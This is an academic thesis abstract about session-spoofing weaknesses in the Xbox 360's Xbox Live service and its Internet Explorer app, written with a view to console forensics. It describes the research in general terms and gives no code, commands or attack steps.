Investigating evidence produced by online session spoofing: the Xbox 360
Video games and the consoles upon which they are played have become progressively popular in recent times, however the body of work in regards to how they should be handled forensically remains surprisingly lacking. Furthermore, these consoles rely at least in part on a content distribution method known as digital distribution, wherein they offer digital goods and services to the consumer via various forms of digital storefront, as is also becoming quite common amongst the video game playing users of the PC. The protections surrounding these storefronts, beyond the encryptions used for communications and transactions, are typically account-based; this however leaves both the user and the owner of the distribution services open to a type of attack known as session spoofing, wherein an attacker masks their identity using a pre-existing and active ‘session’ of communication between a given service and a victim user.
As such, the aims of this thesis are twofold; the first is to explore the vulnerabilities that such a service has in the domain of video game consoles, and the second is in some way to improve the existing body of knowledge in regards to video game consoles, session spoofing attacks, and forensic techniques that can be applied to both consoles and session spoofing attacks. Towards these goals, this thesis first begins with a literature review of current publications in the domains of video game forensics, session spoofing, online marketplaces, and ultimately focuses on the Xbox 360, due to its design familiarities with the modern PC. Of prime concern within this review are the unique challenges that come from attempting forensic methods upon video game consoles, mainly due to their unique design and the heavy anti-piracy and encryption methods that are typically deployed with them. For testing all tests were carried out in an isolated network that was compliant with university policies and the law so that the only session identification items collected were ones sent to the test computer as the result of the Xbox 360 performing its usual and expected actions for a game player. An initial test of attempting to short-circuit the login process of an Xbox 360 into the Xbox Live service, causing one user to appear as another while allowing the Xbox 360 to take care of all other communications once the spoof is successful, was attempted. This, unfortunately, proved to be untenable due to the heavy encryption used by the Xbox 360 for its communications with the Xbox Live service. As such, a revised test is devised that instead focused on how the Xbox Live service may, through the course of normal use by a user, allow a session spoofing attack to be performed; towards this end, the traffic from a Xbox 360 is analyzed, with attention paid to the Xbox Live service, the applications that it provides, and ultimately the Internet Explorer application that is provided by the service. This allows for the observation that the Internet Explorer application (app) is a simple, albeit unpatched, version of the actual Internet Explorer program for PCs, and as such is vulnerable to session spoofing attacks using session identifications sent via IE. Unfortunately, in the process of this adjusted test, the plans for a forensic investigation of the Xbox 360 were forced to be dropped and are not part of this thesis. From these findings, areas of weakness are identified in the Xbox Live service, and the attack itself is compared with the findings of the papers reviewed in the literature. In addition to these findings, more work still needs to be done in this area, notably in the forensic field; further exploratory research should also be made on the Xbox Live service and its kin on other consoles and the PC itself. Such work would better prepare investigators for console investigations and alert console developers to weaknesses that can be patched.